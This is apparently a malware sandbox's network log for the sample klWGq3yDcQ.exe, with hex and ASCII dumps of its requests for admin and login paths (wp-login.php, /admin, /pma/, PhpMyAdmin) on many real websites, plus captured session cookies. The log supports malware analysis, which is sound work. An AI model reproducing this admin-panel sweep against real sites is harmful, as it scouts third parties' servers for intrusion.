                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6ImFaN0VzMVVDbXAvRDkyTnVRTzV0dXc9PSIsInZhbHVlIjoiQ1RrUXRVb0ZpRlFJbEpYRG82SUhOc0tBL1l1enluT3MyWkE0cVVlb1czK21aUitnQUlQUWl3bmZkOEtINTBFRlZ6UG1RSVNNU01zK3AyS2R3c25WbXlqVFRubnp0VVNpVGJWVlI5d2d2STlkK1dvRHN3WmZXcktLUVZ4WVR0OHoiLCJtYWMiOiI4ODk3YmFiZWJhNWQ1OGM4OTM4YjdmNGJmYWI5M2JiM2Q1YjEyOGU2NTE1ZDE4MmE0MTFlOTc4OGIyZGUzNzAyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InVZN29GKzIwOFdCWTc0d3k1Y1J6OWc9PSIsInZhbHVlIjoiUnJhQ3h1dkxsVDJvOW1HeFFna3pqN2FsRWpPMEwwSjFwNVQwNjlmVUJkUmhjRjA5VXNaSTBkcGNUV0E2UXJNOGluNzN2bzhHN3Bnc2xySDQxdlNUVkp4OGhzSDlFNnR0SUtISHBETzhIUjMzcE83MWtjc2dOL3hnMHpiWWQ1Q20iLCJtYWMiOiI0NzYxMjc3MWRkYjMxOTk5NDRjNjc4ZTY5MDJjY2U2OTk3ZjgwMjc1Yzg5ZDFmOGEzMzRhMGViNmI1YTU3NGQ4IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InpSM1A3WnZQd1FBWE0zYndjS3lTMVE9PSIsInZhbHVlIjoiSVV2dW5TdHArb1liMVNCeG5EVjFwR1RJN1dWYmhLRE5scXJaOXFyVlF2d1RkcXNSVnZkTk5xeWJCTkh6dFl4STF4NzIwL25sWTZJUUs4T1hvYzBTKzBwWi9HZDZSR0lreDlFQzBkanB3eTFLWHExbTg3SmM3Rm9raklEZmFBL08iLCJtYWMiOiJlNjI4YTJlZjk4YTk5M2MzYzRkMTAwNmY2NTNiMzIxZmY1MzE1MGM0Y2VhMDc5YmFmYTRkMjk3YTgzYzZiZDY2IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1135INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:44 GMTLocation: https://www.gatewaytoearlylearning.com/PhpMyAdminSet-Cookie: publis
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 39 46 63 32 4d 77 4e 57 38 7a 65 46 70 4e 51 6d 39 59 5a 44 5a 53 4e 6c 42 46 64 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 32 64 4d 63 33 4e 72 64 54 4a 53 62 54 4e 79 54 6d 52 53 56 6b 39 61 64 30 4a 76 62 46 70 70 54 47 70 47 61 44 6c 48 4d 79 74 57 4c 31 4a 36 4e 6e 6b 31 52 30 4a 6e 56 56 64 53 61 48 56 43 51 57 74 35 4d 53 74 53 64 44 64 36 52 30 78 56 61 7a 46 47 55 33 64 6c 51 6e 4a 55 5a 48 4a 5a 61 54 64 6c 62 47 31 35 4e 32 4d 77 5a 6a 6c 55 5a 45 67 33 55 6e 6c 43 64 54 64 7a 56 33 64 6b 65 58 6c 6d 59 33 42 52 62 55 78 68 55 44 6c 49 63 57 5a 4b 57 47 56 6b 61 44 6c 54 5a 6b 74 42 57 47 56 49 55 45
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6Ik9Fc2MwNW8zeFpNQm9YZDZSNlBFdnc9PSIsInZhbHVlIjoid2dMc3NrdTJSbTNyTmRSVk9ad0JvbFppTGpGaDlHMytWL1J6Nnk1R0JnVVdSaHVCQWt5MStSdDd6R0xVazFGU3dlQnJUZHJZaTdlbG15N2MwZjlUZEg3UnlCdTdzV3dkeXlmY3BRbUxhUDlIcWZKWGVkaDlTZktBWGVIUE
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC454INData Raw: 31 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 50 68 70 4d 79 41 64
                                                                                                                                                                                                    Data Ascii: 1ba<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/PhpMyAdmin'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/PhpMyAd


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    419192.168.2.45071872.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC166OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC642INData Raw: 32 37 36 0d 0a 2f 61 64 6d 69 6e 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 276/adminOOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    420192.168.2.450711185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC221OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.grantstech.io/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC339INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 77 70 2d 61 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 321Connection: closeLocation: http://www.grantstech.io/wp-admin/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC321INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/wp-admin/">here</a>.</p><hr><address>Apache/2.4.56


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    421192.168.2.45081815.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC166OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC472INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC15912INData Raw: 37 39 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 795e<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC15171INData Raw: 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 69 62 6c 69 6f 74 65
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/"> Bibliote


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    422192.168.2.450826172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC813INData Raw: 32 32 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2277<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC8018INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    423192.168.2.45100223.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC168OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC925INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 34 31 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 74 61 67 3a 20 57 2f 22 31 37 30 30 39 37 37 31 38 39 22 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 31 39 20 4e 6f 76 20 31 39 37 38 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 55414Cache-Control: max-age=86400, publicContent-Language: enContent-Type: text/html; charset=UTF-8Etag: W/"1700977189"Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Sun, 26 Nov
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1368INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema
